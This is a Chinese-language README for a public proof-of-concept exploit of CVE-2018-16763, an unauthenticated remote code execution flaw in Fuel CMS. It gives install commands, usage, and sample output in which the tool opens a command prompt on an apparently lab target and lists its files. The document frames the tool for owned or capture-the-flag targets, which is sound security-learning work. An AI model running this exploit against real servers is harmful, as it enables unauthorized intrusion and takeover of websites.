
针对 CVE-2018-16763(Fuel CMS - 未认证远程代码执行)的概念验证(PoC)利用程序。
此 Python 3 程序作为 CVE-2018-16763 漏洞在 Fuel CMS 内容管理系统中的 PoC。具体而言,该漏洞允许通过 pages/select/filter 参数进行 PHP 代码评估(本 PoC 中实现),从而导致未认证远程代码执行,这是一个严重系统漏洞。
git clone https://github.com/saccles/CVE-2018-16763-Proof-of-Concept.git
cd CVE-2018-16763-Proof-of-Concept
python3 -m pip install -r requirements.txt
针对易受攻击的目标运行利用脚本。 (仅针对您拥有或由 TryHackMe、HackTheBox 或其他道德黑客网站提供的目标运行脚本!) 建议查看 TryHackMe 的“Ignite”挑战以获取更多详情。您也可以从 exploit-db.com 下载易受攻击的 Fuel CMS 应用程序。
python3 CVE-2018-16763.py -u URL
[DEBUG] 正在连接到 http://10.10.60.46 ...
[DEBUG] 连接成功!
输入命令:
$ ls -la
total 52
drwxrwxrwx 4 root root 4096 Jul 26 2019 .
drwxr-xr-x 3 root root 4096 Jul 26 2019 ..
-rw-r--r-- 1 root root 163 Jul 26 2019 .htaccess
-rwxrwxrwx 1 root root 1427 Jul 26 2019 README.md
drwxrwxrwx 9 root root 4096 Jul 26 2019 assets
-rwxrwxrwx 1 root root 193 Jul 26 2019 composer.json
-rwxrwxrwx 1 root root 6502 Jul 26 2019 contributing.md
drwxrwxrwx 9 root root 4096 Jul 26 2019 fuel
-rwxrwxrwx 1 root root 11802 Jul 26 2019 index.php
-rwxrwxrwx 1 root root 30 Jul 26 2019 robots.txt
python3 CVE-2018-16763.py -h
usage: CVE-2018-16763.py [-h] -u URL
This tool exploits CVE-2018-16763 on Fuel CMS.
options:
-h, --help show this help message and exit
-u URL, --url URL Fuel CMS url.
Silas Accles [saccles]
本项目采用 MIT 许可证 - 详见 LICENSE.md 文件。
高度受 Exploit-DB 程序、Vozec 的 PoC 脚本以及 Padsala Trushal 开发的原始 PoC 启发。